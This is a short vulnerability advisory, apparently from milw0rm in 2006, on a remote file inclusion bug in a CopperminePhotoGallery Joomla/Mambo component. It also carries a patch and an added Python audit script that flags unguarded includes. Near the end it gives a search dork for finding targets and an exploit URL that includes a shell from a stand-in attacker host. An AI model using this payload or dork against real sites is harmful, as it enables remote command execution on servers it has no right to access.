########### CopperminePhotoGallery Component ###########
Found By k1tk4t
Indonesia

This bug allows a remote attacker to execute commands via RFI

file:
cpg.php

bug:
require ($mosConfig_absolute_path."/administrator/components/com_cpg/config.cpg.php");

patch:
add in cpg.php
defined( '_VALID_MOS' ) or die( 'hacking attemp.' );
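
An added audit check, not part of the original advisory or the component's code: it flags PHP source where an include/require built from $mosConfig_absolute_path runs before the _VALID_MOS guard from the patch above. The function name, regexes and sample inputs are constructed for this example, and comment handling is a heuristic, not a PHP parser.

```python
import re

# The guard from the patch above: defined( '_VALID_MOS' ) or die( ... );
GUARD = re.compile(
    r"defined\s*\(\s*['\"]_VALID_MOS['\"]\s*\)\s*(?:or|\|\|)\s*(?:die|exit)\b", re.I)
# include/require statement whose path is built from $mosConfig_absolute_path
INCLUDE = re.compile(
    r"\b(?:require|include)(?:_once)?\b[^;]*\$mosConfig_absolute_path\b", re.I)
# Block comments and whole-line // or # comments (heuristic, not a PHP parser)
COMMENT = re.compile(r"/\*.*?\*/|^[ \t]*(?://|#)[^\n]*", re.S | re.M)


def unguarded_includes(php_source):
    """Return 1-based line numbers of include/require statements that use
    $mosConfig_absolute_path before any _VALID_MOS guard has run."""
    # Blank out comments but keep newlines so line numbers stay correct.
    code = COMMENT.sub(lambda m: re.sub(r"[^\n]", " ", m.group()), php_source)
    guard = GUARD.search(code)
    guard_pos = guard.start() if guard else len(code)
    return [code.count("\n", 0, m.start()) + 1
            for m in INCLUDE.finditer(code) if m.start() < guard_pos]


# Constructed sample inputs modelled on the lines quoted in this advisory.
REQUIRE = ('require ($mosConfig_absolute_path.'
           '"/administrator/components/com_cpg/config.cpg.php");\n')
GUARD_LINE = "defined( '_VALID_MOS' ) or die( 'hacking attemp.' );\n"

SAMPLES = {
    "unpatched": "<?php\n" + REQUIRE,
    "patched": "<?php\n" + GUARD_LINE + REQUIRE,
    "guard_commented_out": "<?php\n// " + GUARD_LINE + REQUIRE,
    "guard_too_late": "<?php\n" + REQUIRE + GUARD_LINE,
}

if __name__ == "__main__":
    for name, src in SAMPLES.items():
        lines = unguarded_includes(src)
        print(f"{name:20} {'FLAG lines ' + str(lines) if lines else 'ok'}")
```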

dork: inurl:com_cpg

expl:
http://www.site.it/components/com_cpg/cpg.php?mosConfig_absolute_path=

http://evil.xxx/shell.txt?

thanks to

e-c-h-o
h4cky0u
milw0rm
google

# milw0rm.com [2006-08-16]